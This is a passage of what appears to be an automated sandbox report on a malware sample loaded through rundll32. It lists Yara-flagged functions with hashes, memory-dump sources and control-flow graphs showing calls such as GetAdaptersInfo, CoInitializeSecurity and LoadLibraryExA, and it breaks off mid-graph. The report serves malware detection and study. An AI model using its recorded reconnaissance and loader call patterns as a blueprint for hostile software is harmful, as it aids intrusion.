                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ComputerName
                                                • String ID: WORKGROUP
                                                • API String ID: 3545744682-2380569353
                                                • Opcode ID: 54acc390961225efba6a2cf1ce98acd9b39675254c6db979224791a88954b7ab
                                                • Instruction ID: bf2811f695f0da13a13fd0aaff168e7d4e0072c223cf92704bcbdc7b99095c4e
                                                • Opcode Fuzzy Hash: 54acc390961225efba6a2cf1ce98acd9b39675254c6db979224791a88954b7ab
                                                • Instruction Fuzzy Hash: 3AB1BF78E052599FDB58CFA8C890BDDFBB2BF48304F208199E859A7345D730AA85CF51
                                                Function 7F2E0C00 Relevance: 2.8, Strings: 1, Instructions: 1512COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4302 7f2e0c00-7f2e0cda call 7f292ff0 call 7f2c21e0 call 7f2b15e0 call 7f2c66d0 call 7f2b0070 call 7f2c6350 call 7f2b2b40 call 7f2c6690 4319 7f2e0cdc-7f2e0ceb 4302->4319 4320 7f2e0d43-7f2e0d49 4302->4320 4321 7f2e0cf1-7f2e0d01 4319->4321 4322 7f2e0d4b-7f2e0d5a 4320->4322 4323 7f2e0db2-7f2e0e42 call 7f293160 call 7f2a63a0 call 7f292ff0 4320->4323 4321->4321 4325 7f2e0d03-7f2e0d3e call 7f2c3290 4321->4325 4326 7f2e0d60-7f2e0d70 4322->4326 4335 7f2e0e48-7f2e0e58 4323->4335 4325->4320 4326->4326 4329 7f2e0d72-7f2e0dad call 7f2c3290 4326->4329 4329->4323 4335->4335 4336 7f2e0e5a-7f2e1a11 call 7f295360 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2a5f50 call 7f293160 call 7f2a63a0 call 7f2945d0 call 7f29d1f0 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2a5f50 call 7f293160 call 7f2a63a0 call 7f2945d0 call 7f29d1f0 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2a5f50 call 7f293160 call 7f2a63a0 call 7f2945d0 call 7f29d1f0 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2a5f50 call 7f293160 call 7f2a63a0 call 7f2945d0 call 7f29d1f0 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2a5f50 call 7f293160 call 7f2a63a0 call 7f2a6480 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2a5f50 call 7f293160 call 7f2a63a0 call 7f2a6480 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2a5f50 * 2 call 7f2f06c6 * 2 call 7f2c20f0 call 7f2f06c6 call 7f2c20f0 call 7f2f06c6 call 7f2c20f0 call 7f2f06c6 call 7f2c20f0 call 7f2f06c6 call 7f2c20f0 call 7f2f06c6 call 7f2c20f0 call 7f2f06c6 call 7f2c20f0 call 7f2d39c0 call 7f2c1690 call 7f2d5ec0 call 7f292ff0 4335->4336 4493 7f2e1a17-7f2e1a27 4336->4493 4493->4493 4494 7f2e1a29-7f2e1b3b call 7f295360 call 7f2c20f0 call 7f2948d0 call 7f2a9e20 call 7f2c20f0 call 7f2a63a0 * 3 call 7f2e4390 4493->4494 4513 7f2e1b3d-7f2e1b8a call 7f2b1e10 call 7f2c6090 call 7f2c1690 call 7f2a1cf0 4494->4513 4514 7f2e1b90-7f2e1c0f call 7f2a63a0 * 2 call 7f292ff0 4494->4514 4513->4514 4534 7f2e24d1-7f2e25b7 call 7f2a63a0 * 2 call 7f2c72d0 call 7f2c20f0 * 2 call 7f2c3200 call 7f2c7680 call 7f2c20f0 * 3 call 7f2c3200 call 7f2c7680 call 7f2c20f0 * 2 4513->4534 4527 7f2e1c15-7f2e1c25 4514->4527 4527->4527 4530 7f2e1c27-7f2e1c9b call 7f295360 call 7f2e4390 4527->4530 4538 7f2e1c9d-7f2e1cea call 7f2aca40 call 7f2c62d0 call 7f2c1690 call 7f2a1cf0 4530->4538 4539 7f2e1cf0-7f2e1d6e call 7f2a63a0 * 2 call 7f292ff0 4530->4539 4636 7f2e25ba-7f2e25c7 4534->4636 4538->4539 4571 7f2e23d4-7f2e24cc call 7f2a63a0 * 2 call 7f2c72d0 call 7f2c20f0 * 3 call 7f2c3200 call 7f2c7680 call 7f2c20f0 * 3 call 7f2c3200 call 7f2c7680 call 7f2c20f0 * 2 4538->4571 4559 7f2e1d74-7f2e1d84 4539->4559 4559->4559 4562 7f2e1d86-7f2e1dfa call 7f295360 call 7f2e4390 4559->4562 4577 7f2e1e4f-7f2e1ece call 7f2a63a0 * 2 call 7f292ff0 4562->4577 4578 7f2e1dfc-7f2e1e49 call 7f2b16b0 call 7f2c6250 call 7f2c1690 call 7f2a1cf0 4562->4578 4571->4636 4606 7f2e1ed4-7f2e1ee4 4577->4606 4578->4577 4619 7f2e22c8-7f2e23cf call 7f2a63a0 * 2 call 7f2c72d0 call 7f2c20f0 * 4 call 7f2c3200 call 7f2c7680 call 7f2c20f0 * 3 call 7f2c3200 call 7f2c7680 call 7f2c20f0 * 2 4578->4619 4606->4606 4611 7f2e1ee6-7f2e1f5a call 7f295360 call 7f2e4390 4606->4611 4628 7f2e1faf-7f2e1ff6 GetPEB 4611->4628 4629 7f2e1f5c-7f2e1fa9 call 7f2b08e0 call 7f2c6290 call 7f2c1690 call 7f2a1cf0 4611->4629 4619->4636 4635 7f2e1ff9-7f2e2054 4628->4635 4629->4628 4670 7f2e21ad-7f2e22c3 call 7f2a63a0 * 2 call 7f2c72d0 call 7f2c20f0 * 5 call 7f2c3200 call 7f2c7680 call 7f2c20f0 * 3 call 7f2c3200 call 7f2c7680 call 7f2c20f0 * 2 4629->4670 4640 7f2e2056-7f2e2060 4635->4640 4641 7f2e2062 4635->4641 4645 7f2e206c-7f2e207b 4640->4645 4641->4645 4646 7f2e2164-7f2e218e 4645->4646 4647 7f2e2081-7f2e2087 4645->4647 4646->4635 4655 7f2e2194 4646->4655 4651 7f2e208a-7f2e20a3 4647->4651 4651->4646 4656 7f2e20a9-7f2e20ca 4651->4656 4660 7f2e219e-7f2e21a6 4655->4660 4661 7f2e20d1-7f2e20e8 4656->4661 4660->4670 4665 7f2e20ea-7f2e2112 4661->4665 4666 7f2e20f5-7f2e2106 4661->4666 4675 7f2e215f 4665->4675 4676 7f2e2114-7f2e215d 4665->4676 4666->4661 4670->4636 4675->4651 4676->4660
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::exception::exception
                                                • String ID: L
                                                • API String ID: 2807920213-2909332022
                                                • Opcode ID: 545ef6fb78597cc2fde0e49689b80c364268c633d205e349baee2599a4936df9
                                                • Instruction ID: e7f9e0b081f7ed885a42bee6b3927fea9fdb154dd285d049c1429cbfd25fc2ce
                                                • Opcode Fuzzy Hash: 545ef6fb78597cc2fde0e49689b80c364268c633d205e349baee2599a4936df9
                                                • Instruction Fuzzy Hash: 5F0330B0D052A88FCB25CB68CD94BDEBBB5AF58304F1082D9D449A7281DB716F84CF91
                                                Function 6C35D860 Relevance: 2.6, APIs: 1, Instructions: 1057COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4738 6c35d860-6c35d8a3 call 6c35d2a0 call 6c352460 call 6c35d120 4746 6c35d8a5-6c35d8a9 4738->4746 4747 6c35d8ab-6c35d8ad 4738->4747 4746->4747 4748 6c35d8b2-6c35d8ff 4746->4748 4749 6c35e554-6c35e557 4747->4749 4750 6c35d906-6c35dc06 call 6c35d350 call 6c352460 call 6c35d1e0 CoInitializeSecurity call 6c35d840 call 6c35d850 * 2 call 6c35d830 * 8 call 6c35d840 call 6c35d850 * 2 call 6c35d830 * 8 call 6c35d400 call 6c352460 call 6c35d1b0 4748->4750 4808 6c35dc0e 4750->4808 4809 6c35dc08-6c35dc0c 4750->4809 4811 6c35e41f-6c35e423 4808->4811 4809->4808 4810 6c35dc13-6c35dcbc call 6c35d0f0 call 6c35d240 4809->4810 4841 6c35dcc4 4810->4841 4842 6c35dcbe-6c35dcc2 4810->4842 4813 6c35e425-6c35e432 call 6c35d210 4811->4813 4814 6c35e437-6c35e43b 4811->4814 4813->4814 4815 6c35e43d-6c35e446 4814->4815 4816 6c35e44b-6c35e44f 4814->4816 4815->4816 4819 6c35e451-6c35e45a 4816->4819 4820 6c35e45f-6c35e463 4816->4820 4819->4820 4822 6c35e465-6c35e46e 4820->4822 4823 6c35e473-6c35e477 4820->4823 4822->4823 4825 6c35e487-6c35e48b 4823->4825 4826 6c35e479-6c35e482 4823->4826 4827 6c35e48d-6c35e496 4825->4827 4828 6c35e49b-6c35e49f 4825->4828 4826->4825 4827->4828 4830 6c35e4a1-6c35e4aa 4828->4830 4831 6c35e4af-6c35e4b3 4828->4831 4830->4831 4834 6c35e4b5-6c35e4be 4831->4834 4835 6c35e4c3-6c35e4c7 4831->4835 4834->4835 4836 6c35e4d7-6c35e4db 4835->4836 4837 6c35e4c9-6c35e4d2 4835->4837 4839 6c35e4dd-6c35e4e6 4836->4839 4840 6c35e4eb-6c35e4ef 4836->4840 4837->4836 4839->4840 4843 6c35e4f1-6c35e4fa 4840->4843 4844 6c35e4ff-6c35e503 4840->4844 4841->4811 4842->4841 4845 6c35dcc9-6c35dce4 4842->4845 4843->4844 4846 6c35e505-6c35e50e 4844->4846 4847 6c35e513-6c35e53f call 6c35d6e0 call 6c352460 call 6c35d180 4844->4847 4852 6c35dce6-6c35dcea 4845->4852 4853 6c35dcec 4845->4853 4846->4847 4863 6c35e541-6c35e548 4847->4863 4864 6c35e54a 4847->4864 4852->4853 4855 6c35dcf1-6c35dd0a 4852->4855 4853->4811 4859 6c35dd12 4855->4859 4860 6c35dd0c-6c35dd10 4855->4860 4859->4811 4860->4859 4862 6c35dd17-6c35dd32 4860->4862 4867 6c35dd34-6c35dd38 4862->4867 4868 6c35dd3a 4862->4868 4866 6c35e551 4863->4866 4864->4866 4866->4749 4867->4868 4869 6c35dd3f-6c35dd56 4867->4869 4868->4811 4871 6c35dd5e 4869->4871 4872 6c35dd58-6c35dd5c 4869->4872 4871->4811 4872->4871 4873 6c35dd63-6c35dd7c 4872->4873 4875 6c35dd84 4873->4875 4876 6c35dd7e-6c35dd82 4873->4876 4875->4811 4876->4875 4877 6c35dd89-6c35ddf9 call 6c35d0c0 4876->4877 4881 6c35ddff-6c35de1c 4877->4881 4882 6c35deea-6c35df70 call 6c35d4b0 call 6c35e5e0 call 6c35d150 4877->4882 4881->4882 4883 6c35de22-6c35de3a 4881->4883 4908 6c35df76-6c35e02c call 6c35d620 call 6c35e560 call 6c35d680 call 6c35e560 4882->4908 4909 6c35e04f-6c35e0fa call 6c35d270 call 6c35d150 4882->4909 4885 6c35de71-6c35de78 4883->4885 4886 6c35de3c-6c35de46 4883->4886 4891 6c35deae-6c35deb5 4885->4891 4892 6c35de7a-6c35de83 4885->4892 4888 6c35de4d-6c35de4f 4886->4888 4889 6c35de48-6c35de4c 4886->4889 4888->4885 4895 6c35de51-6c35de58 4888->4895 4889->4888 4893 6c35deb7-6c35dec8 4891->4893 4894 6c35decc-6c35ded3 4891->4894 4897 6c35de85-6c35de89 4892->4897 4898 6c35de8a-6c35de8c 4892->4898 4893->4894 4894->4882 4899 6c35ded5-6c35dee6 4894->4899 4895->4885 4900 6c35de5a-6c35de6f 4895->4900 4897->4898 4898->4891 4902 6c35de8e-6c35de95 4898->4902 4899->4882 4900->4894 4902->4891 4904 6c35de97-6c35deac 4902->4904 4904->4894 4908->4909 4943 6c35e02e-6c35e04a 4908->4943 4925 6c35e102 4909->4925 4926 6c35e0fc-6c35e100 4909->4926 4925->4811 4926->4925 4928 6c35e107-6c35e120 4926->4928 4932 6c35e122-6c35e126 4928->4932 4933 6c35e128 4928->4933 4932->4933 4935 6c35e12d-6c35e148 4932->4935 4933->4811 4938 6c35e150 4935->4938 4939 6c35e14a-6c35e14e 4935->4939 4938->4811 4939->4938 4940 6c35e155-6c35e2d4 call 6c35d840 call 6c35d850 * 2 call 6c35d830 * 8 4939->4940 4967 6c35e2d6-6c35e2da 4940->4967 4968 6c35e2dc 4940->4968 4943->4909 4967->4968 4969 6c35e2e1-6c35e2fa 4967->4969 4968->4811 4971 6c35e302 4969->4971 4972 6c35e2fc-6c35e300 4969->4972 4971->4811 4972->4971 4973 6c35e307-6c35e320 4972->4973 4975 6c35e322-6c35e326 4973->4975 4976 6c35e328 4973->4976 4975->4976 4977 6c35e32d-6c35e346 4975->4977 4976->4811 4979 6c35e34e 4977->4979 4980 6c35e348-6c35e34c 4977->4980 4979->4811 4980->4979 4981 6c35e353-6c35e371 4980->4981 4983 6c35e373-6c35e377 4981->4983 4984 6c35e379 4981->4984 4983->4984 4985 6c35e37e-6c35e3fd call 6c35d0f0 4983->4985 4984->4811 4989 6c35e402-6c35e419 call 6c35d240 4985->4989 4989->4750 4989->4811
                                                APIs
                                                • CoInitializeSecurity.COMBASE(00000003,00000000,00000000,00000000), ref: 6C35D93E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944388836.000000006C331000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C330000, based on PE: true
                                                • Associated: 00000004.00000002.2944371980.000000006C330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944414571.000000006C36B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944431948.000000006C37A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944500505.000000006C58D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944585375.000000006C827000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000004.00000002.2944607422.000000006C828000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6c330000_rundll32.jbxd
                                                Similarity
                                                • API ID: InitializeSecurity
                                                • String ID:
                                                • API String ID: 640775948-0
                                                • Opcode ID: db9457b649139cd010866a32c9e76d10d3d9a377e9d0027193f3160014eba8d2
                                                • Instruction ID: 06052570d706977d47991bd543e284e86171557fd136a3fdd65fbb136fa790be
                                                • Opcode Fuzzy Hash: db9457b649139cd010866a32c9e76d10d3d9a377e9d0027193f3160014eba8d2
                                                • Instruction Fuzzy Hash: 29929EB4E00218DFDB04DFE4C941BEEB7B1AF48304F1081A9E509AB791D7799A95CF62
                                                Function 7F2DB260 Relevance: 2.4, APIs: 1, Instructions: 863COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4993 7f2db260-7f2db2db call 7f2f0cc0 GetPEB 4996 7f2db2e1-7f2db33f 4993->4996 4997 7f2db34d 4996->4997 4998 7f2db341-7f2db34b 4996->4998 4999 7f2db357-7f2db366 4997->4999 4998->4999 5000 7f2db36c-7f2db372 4999->5000 5001 7f2db467-7f2db497 4999->5001 5003 7f2db375-7f2db38e 5000->5003 5001->4996 5002 7f2db49d 5001->5002 5004 7f2db4a7-7f2db4ca GetAdaptersInfo 5002->5004 5003->5001 5005 7f2db394-7f2db3b8 5003->5005 5006 7f2db85e-7f2db8e7 call 7f2b37d0 call 7f2c6a90 GetPEB 5004->5006 5007 7f2db4d0-7f2db5d1 call 7f2b2380 call 7f2c6d50 GetPEB 5004->5007 5008 7f2db3c2-7f2db3e2 5005->5008 5022 7f2db8ed-7f2db94b 5006->5022 5023 7f2db5d7-7f2db635 5007->5023 5010 7f2db3e4-7f2db415 5008->5010 5011 7f2db3f2-7f2db409 5008->5011 5018 7f2db417-7f2db460 5010->5018 5019 7f2db462 5010->5019 5011->5008 5018->5004 5019->5003 5024 7f2db94d-7f2db957 5022->5024 5025 7f2db959 5022->5025 5026 7f2db637-7f2db641 5023->5026 5027 7f2db643 5023->5027 5028 7f2db963-7f2db972 5024->5028 5025->5028 5029 7f2db64d-7f2db65c 5026->5029 5027->5029 5030 7f2db978-7f2db97e 5028->5030 5031 7f2dba73-7f2dbaa3 5028->5031 5032 7f2db75d-7f2db78d 5029->5032 5033 7f2db662-7f2db668 5029->5033 5036 7f2db981-7f2db99a 5030->5036 5031->5022 5034 7f2dbaa9 5031->5034 5032->5023 5035 7f2db793 5032->5035 5037 7f2db66b-7f2db684 5033->5037 5038 7f2dbab3-7f2dbb5a call 7f2b0b70 call 7f2c6b90 GetPEB 5034->5038 5039 7f2db79d-7f2db801 5035->5039 5036->5031 5040 7f2db9a0-7f2db9c4 5036->5040 5037->5032 5041 7f2db68a-7f2db6ae 5037->5041 5064 7f2dbb60-7f2dbbca 5038->5064 5052 7f2db807-7f2db817 5039->5052 5042 7f2db9ce-7f2db9ee 5040->5042 5043 7f2db6b8-7f2db6d8 5041->5043 5048 7f2db9fe-7f2dba15 5042->5048 5049 7f2db9f0-7f2dba21 5042->5049 5044 7f2db6e8-7f2db6ff 5043->5044 5045 7f2db6da-7f2db70b 5043->5045 5044->5043 5054 7f2db70d-7f2db756 5045->5054 5055 7f2db758 5045->5055 5048->5042 5058 7f2dba6e 5049->5058 5059 7f2dba23-7f2dba6c 5049->5059 5052->5052 5057 7f2db819-7f2db859 call 7f2c3290 5052->5057 5054->5039 5055->5037 5065 7f2dc15d-7f2dc160 5057->5065 5058->5036 5059->5038 5066 7f2dbbcc-7f2dbbd6 5064->5066 5067 7f2dbbd8 5064->5067 5068 7f2dbbe2-7f2dbbf1 5066->5068 5067->5068 5069 7f2dbd0d-7f2dbd3d 5068->5069 5070 7f2dbbf7-7f2dbc00 5068->5070 5069->5064 5071 7f2dbd43 5069->5071 5072 7f2dbc03-7f2dbc1c 5070->5072 5073 7f2dbd4d-7f2dbdf5 call 7f2af940 call 7f2c6d10 GetPEB 5071->5073 5072->5069 5074 7f2dbc22-7f2dbc4f 5072->5074 5086 7f2dbdfb-7f2dbe59 5073->5086 5075 7f2dbc59-7f2dbc79 5074->5075 5076 7f2dbc89-7f2dbca0 5075->5076 5077 7f2dbc7b-7f2dbcac 5075->5077 5076->5075 5081 7f2dbcae-7f2dbd06 5077->5081 5082 7f2dbd08 5077->5082 5081->5073 5082->5072 5087 7f2dbe5b-7f2dbe65 5086->5087 5088 7f2dbe67 5086->5088 5089 7f2dbe71-7f2dbe80 5087->5089 5088->5089 5090 7f2dbe86-7f2dbe8c 5089->5090 5091 7f2dbf81-7f2dbfb1 5089->5091 5092 7f2dbe8f-7f2dbea8 5090->5092 5091->5086 5093 7f2dbfb7 5091->5093 5092->5091 5094 7f2dbeae-7f2dbed2 5092->5094 5095 7f2dbfc1-7f2dc105 call 7f2a1e70 call 7f2ae1b0 call 7f2c6510 call 7f2a1c30 * 2 call 7f2b1840 call 7f2c64d0 call 7f2a1c30 * 2 call 7f2ab340 call 7f2c6390 call 7f2a1c30 call 7f2ee9e0 5093->5095 5096 7f2dbedc-7f2dbefc 5094->5096 5135 7f2dc10b-7f2dc11b 5095->5135 5098 7f2dbf0c-7f2dbf23 5096->5098 5099 7f2dbefe-7f2dbf2f 5096->5099 5098->5096 5103 7f2dbf7c 5099->5103 5104 7f2dbf31-7f2dbf7a 5099->5104 5103->5092 5104->5095 5135->5135 5136 7f2dc11d-7f2dc158 call 7f2c3290 5135->5136 5136->5065
                                                APIs
                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 7F2DB4B7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdaptersInfo
                                                • String ID:
                                                • API String ID: 3177971545-0
                                                • Opcode ID: ccb6594179ea9e48dce5ba93e0308c6044ea7073e09f897d118cb6bf958f1285
                                                • Instruction ID: ff2fed4f168b6ca09c66103f6aa75a1ca7c66ee7d875574c87a6ce04aa390872
                                                • Opcode Fuzzy Hash: ccb6594179ea9e48dce5ba93e0308c6044ea7073e09f897d118cb6bf958f1285
                                                • Instruction Fuzzy Hash: C6A2BE74E052699FDB68CF58C894BDDBBB1BF89304F1081EAD849A7355DB30AA81CF50
                                                Function 7F2D7660 Relevance: 2.2, Strings: 1, Instructions: 908COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5138 7f2d7660-7f2d7722 call 7f2b30f0 call 7f2c6610 call 7f2c36a0 call 7f2d6070 call 7f2aa1a0 5150 7f2d772d 5138->5150 5151 7f2d7724-7f2d772b 5138->5151 5152 7f2d7734-7f2d773a 5150->5152 5151->5152 5153 7f2d7868-7f2d78c7 call 7f2c20f0 * 4 call 7f2945d0 call 7f2eb2a0 5152->5153 5154 7f2d7740-7f2d7766 call 7f2e09b0 call 7f2944b0 5152->5154 5182 7f2d78cd-7f2d79dd call 7f2a63a0 call 7f2945d0 call 7f2aa670 call 7f29d1f0 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2945d0 call 7f2aa670 call 7f2a9d60 call 7f2c20f0 5153->5182 5183 7f2d79e2-7f2d7a52 call 7f2d39c0 call 7f2c1690 call 7f2d5ec0 call 7f292ff0 5153->5183 5163 7f2d776c-7f2d785e call 7f2a63a0 call 7f2aacc0 call 7f29d1f0 call 7f2c5a00 call 7f2c1690 call 7f2d5ec0 call 7f293160 call 7f2aacc0 call 7f2a9d60 call 7f2c20f0 5154->5163 5164 7f2d7863 5154->5164 5163->5164 5211 7f2d7a58-7f2d7a68 5183->5211 5211->5211 5214 7f2d7a6a-7f2d7b54 call 7f295360 call 7f2c20f0 call 7f2948d0 call 7f2a9e20 call 7f2c20f0 call 7f2a63a0 * 3 call 7f2e4390 5211->5214 5246 7f2d7b59-7f2d7b79 5214->5246 5247 7f2d7b7b-7f2d7bbf call 7f2ac2e0 call 7f2c6150 call 7f2c1690 call 7f2a1cf0 5246->5247 5248 7f2d7bc5-7f2d7c3e call 7f2a63a0 * 2 call 7f292ff0 5246->5248 5247->5248 5268 7f2d843d-7f2d84ef call 7f2a63a0 * 2 call 7f2c72d0 call 7f2c20f0 * 4 call 7f2c3200 call 7f2c7680 call 7f2c20f0 5247->5268 5262 7f2d7c44-7f2d7c54 5248->5262 5262->5262 5264 7f2d7c56-7f2d7cc7 call 7f295360 call 7f2e4390 5262->5264 5272 7f2d7cc9-7f2d7d0d call 7f2b19e0 call 7f2c6010 call 7f2c1690 call 7f2a1cf0 5264->5272 5273 7f2d7d13-7f2d7d85 call 7f2a63a0 * 2 call 7f292ff0 5264->5273 5336 7f2d84f2-7f2d84ff 5268->5336 5272->5273 5306 7f2d8374-7f2d8438 call 7f2a63a0 * 2 call 7f2c72d0 call 7f2c20f0 * 5 call 7f2c3200 call 7f2c7680 call 7f2c20f0 5272->5306 5294 7f2d7d8b-7f2d7d9b 5273->5294 5294->5294 5297 7f2d7d9d-7f2d7e0b call 7f295360 call 7f2e4390 5294->5297 5312 7f2d7e0d-7f2d7e51 call 7f2ad3a0 call 7f2c6050 call 7f2c1690 call 7f2a1cf0 5297->5312 5313 7f2d7e57-7f2d7ed6 call 7f2a63a0 * 2 call 7f292ff0 5297->5313 5306->5336 5312->5313 5349 7f2d829c-7f2d836f call 7f2a63a0 * 2 call 7f2c72d0 call 7f2c20f0 * 6 call 7f2c3200 call 7f2c7680 call 7f2c20f0 5312->5349 5340 7f2d7edc-7f2d7eec 5313->5340 5340->5340 5343 7f2d7eee-7f2d7f62 call 7f295360 call 7f2e4390 5340->5343 5356 7f2d7f64-7f2d7fb1 call 7f2ae9d0 call 7f2c61d0 call 7f2c1690 call 7f2a1cf0 5343->5356 5357 7f2d7fb7-7f2d7ffe GetPEB 5343->5357 5349->5336 5356->5357 5395 7f2d81b5-7f2d8297 call 7f2a63a0 * 2 call 7f2c72d0 call 7f2c20f0 * 7 call 7f2c3200 call 7f2c7680 call 7f2c20f0 5356->5395 5362 7f2d8001-7f2d805c 5357->5362 5366 7f2d805e-7f2d8068 5362->5366 5367 7f2d806a 5362->5367 5368 7f2d8074-7f2d8083 5366->5368 5367->5368 5372 7f2d816c-7f2d8196 5368->5372 5373 7f2d8089-7f2d808f 5368->5373 5372->5362 5381 7f2d819c 5372->5381 5378 7f2d8092-7f2d80ab 5373->5378 5378->5372 5383 7f2d80b1-7f2d80d2 5378->5383 5386 7f2d81a6-7f2d81ae 5381->5386 5388 7f2d80d9-7f2d80f0 5383->5388 5386->5395 5392 7f2d80fd-7f2d810e 5388->5392 5393 7f2d80f2-7f2d811a 5388->5393 5392->5388 5401 7f2d811c-7f2d8165 5393->5401 5402 7f2d8167 5393->5402 5395->5336 5401->5386 5402->5378
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "
                                                • API String ID: 0-123907689
                                                • Opcode ID: 0d045b919acd5917f8a93848944d51f31192527b049818e313b4d9de1bda6d96
                                                • Instruction ID: f130a4923ee8b783040cf7536d2cd377b5254aa5d23ceae6024dda36d1a41e38
                                                • Opcode Fuzzy Hash: 0d045b919acd5917f8a93848944d51f31192527b049818e313b4d9de1bda6d96
                                                • Instruction Fuzzy Hash: 1DA23270D05258DFCB14DBA8C894BDEBBB1AF58304F1082D9E849A7281DB35AF84DF91
                                                Function 7F2C4392 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5440 7f2c4392-7f2c43d8 GetPEB 5442 7f2c43de-7f2c443c 5440->5442 5443 7f2c443e-7f2c4448 5442->5443 5444 7f2c444a 5442->5444 5445 7f2c4454-7f2c4463 5443->5445 5444->5445 5446 7f2c4469-7f2c446f 5445->5446 5447 7f2c4564-7f2c4594 5445->5447 5448 7f2c4472-7f2c448b 5446->5448 5447->5442 5449 7f2c459a 5447->5449 5448->5447 5450 7f2c4491-7f2c44b5 5448->5450 5451 7f2c45a4-7f2c45b3 PathIsDirectoryW 5449->5451 5454 7f2c44bf-7f2c44df 5450->5454 5452 7f2c45b9-7f2c45e2 call 7f2d8fa0 5451->5452 5453 7f2c4d07-7f2c4d19 5451->5453 5461 7f2c45fc-7f2c4606 5452->5461 5462 7f2c45e4-7f2c45fa 5452->5462 5458 7f2c4d1b-7f2c4d21 5453->5458 5456 7f2c44ef-7f2c4506 5454->5456 5457 7f2c44e1-7f2c4512 5454->5457 5456->5454 5463 7f2c455f 5457->5463 5464 7f2c4514-7f2c455d 5457->5464 5465 7f2c4624-7f2c466a 5461->5465 5466 7f2c4608-7f2c460e 5461->5466 5462->5465 5463->5448 5464->5451 5468 7f2c47db-7f2c4855 LoadLibraryExA 5465->5468 5469 7f2c4670-7f2c467c 5465->5469 5466->5465 5467 7f2c4610-7f2c461d 5466->5467 5467->5465 5471 7f2c4857-7f2c4861 5468->5471 5472 7f2c4863 5468->5472 5469->5468 5470 7f2c4682-7f2c46bd 5469->5470 5470->5468 5473 7f2c46c3-7f2c46cf 5470->5473 5474 7f2c486d-7f2c4877 5471->5474 5472->5474 5473->5468 5475 7f2c46d5-7f2c46df 5473->5475 5476 7f2c4879-7f2c4883 5474->5476 5477 7f2c4885 5474->5477 5479 7f2c46f0-7f2c46fa 5475->5479 5478 7f2c488f-7f2c489b 5476->5478 5477->5478 5480 7f2c48a1-7f2c48de call 7f2d9280 5478->5480 5481 7f2c49a3-7f2c49aa 5478->5481 5482 7f2c47bf 5479->5482 5483 7f2c4700-7f2c471a 5479->5483 5498 7f2c48e4 5480->5498 5499 7f2c4965-7f2c496c 5480->5499 5484 7f2c4a6c-7f2c4abe 5481->5484 5485 7f2c49b0-7f2c4a33 call 7f2f0b50 5481->5485 5482->5468 5487 7f2c471c 5483->5487 5488 7f2c4735 5483->5488 5484->5453 5494 7f2c4ac4-7f2c4adb 5484->5494 5501 7f2c4a49-7f2c4a4c 5485->5501 5502 7f2c4a35-7f2c4a47 5485->5502 5489 7f2c471e-7f2c4727 5487->5489 5490 7f2c4729-7f2c4733 5487->5490 5492 7f2c473f-7f2c4746 5488->5492 5489->5488 5489->5490 5490->5492 5496 7f2c4748-7f2c4752 5492->5496 5497 7f2c4754 5492->5497 5500 7f2c4ae1-7f2c4b25 call 7f2d8c80 5494->5500 5503 7f2c475e-7f2c476a 5496->5503 5497->5503 5504 7f2c48ec-7f2c48f2 5498->5504 5505 7f2c48e6-7f2c48ea 5498->5505 5507 7f2c499e 5499->5507 5508 7f2c496e-7f2c4975 5499->5508 5518 7f2c4b27-7f2c4b31 5500->5518 5519 7f2c4b33 5500->5519 5509 7f2c4a54-7f2c4a66 5501->5509 5502->5509 5510 7f2c476c-7f2c479f 5503->5510 5511 7f2c47a1-7f2c47ac 5503->5511 5512 7f2c48f4-7f2c4925 5504->5512 5513 7f2c4927-7f2c4960 5504->5513 5505->5499 5505->5504 5507->5484 5508->5507 5515 7f2c4977-7f2c4998 call 7f2f0b50 5508->5515 5509->5484 5516 